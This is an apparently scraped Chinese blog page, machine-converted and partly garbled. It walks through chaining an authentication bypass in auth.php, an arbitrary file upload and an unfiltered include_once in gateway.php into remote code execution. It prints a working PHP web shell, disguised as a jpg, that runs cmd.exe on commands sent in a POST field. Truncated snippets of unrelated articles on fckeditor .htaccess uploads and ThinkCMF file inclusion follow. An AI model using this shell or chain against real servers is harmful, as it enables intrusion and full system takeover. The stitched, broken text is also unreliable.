建立乙個上傳的頁面
>
>
開啟後,上傳乙個jpg,內容如下
<?php
//儲存為jpg
$phpwsh
=new
com(
"wscript.shell")or
die(
"create wscript.shell failed!");
$exec
=$phpwsh
->
exec
("cmd.exe /c "
.$_post
['cmd'].
"");$stdout
=$exec
->
stdout()
;$stroutput
=$stdout
->
readall()
;echo
$stroutput
;?>
上傳後,得到結果如下
auth.php是登入相關的邏輯操作,修復前,只要p引數不為空就可以繞過auth.php的身份驗證,可以利用跟這個邏輯漏洞來上傳任意檔案。
上傳後的檔案不在根目錄中,需要進行檔案包含才可以利用
ispirit/inte***ce/gateway.php
與上傳相反,沒有p引數即可無需驗證
在右圖的47行中,有include_once函式對url引數中的檔案進行包含,並且url引數沒有進行相關過濾操作,所以可以任意讀取url引數中的檔案。
fckeditor任意檔案上傳漏洞
1.建立.htaccess檔案,內容如下 htaccess檔案可以用來設定某個目錄和某個目錄的子目錄的許可權,以上內容的意思是將副檔名是 php.gif 的檔案解析成php 2.使用如下url,上傳上面建立的的.htaccess檔案 通過這一步上傳,上傳目錄的 php.gif 檔案apache會按照...
任意檔案上傳漏洞修復
一 include dialog select soft post.php檔案,搜尋 大概在72行的樣子 fullfilename cfg basedir.activepath.filename 修改為if preg match php pl cgi asp aspx jsp php5 php4 p...
ThinkCMF框架任意檔案包含漏洞學習復現小記
跟隨大佬學習,了解學習了thinkcmf任意檔案包含漏洞,並進行了一次滲透,下面來寫個學習筆記記錄一下 thinkcmf x1.6.0 thinkcmf x2.1.0 thinkcmf x2.2.0 thinkcmf x2.2.1 thinkcmf x2.2.2 任何人在無需任何許可權情況下,通過構...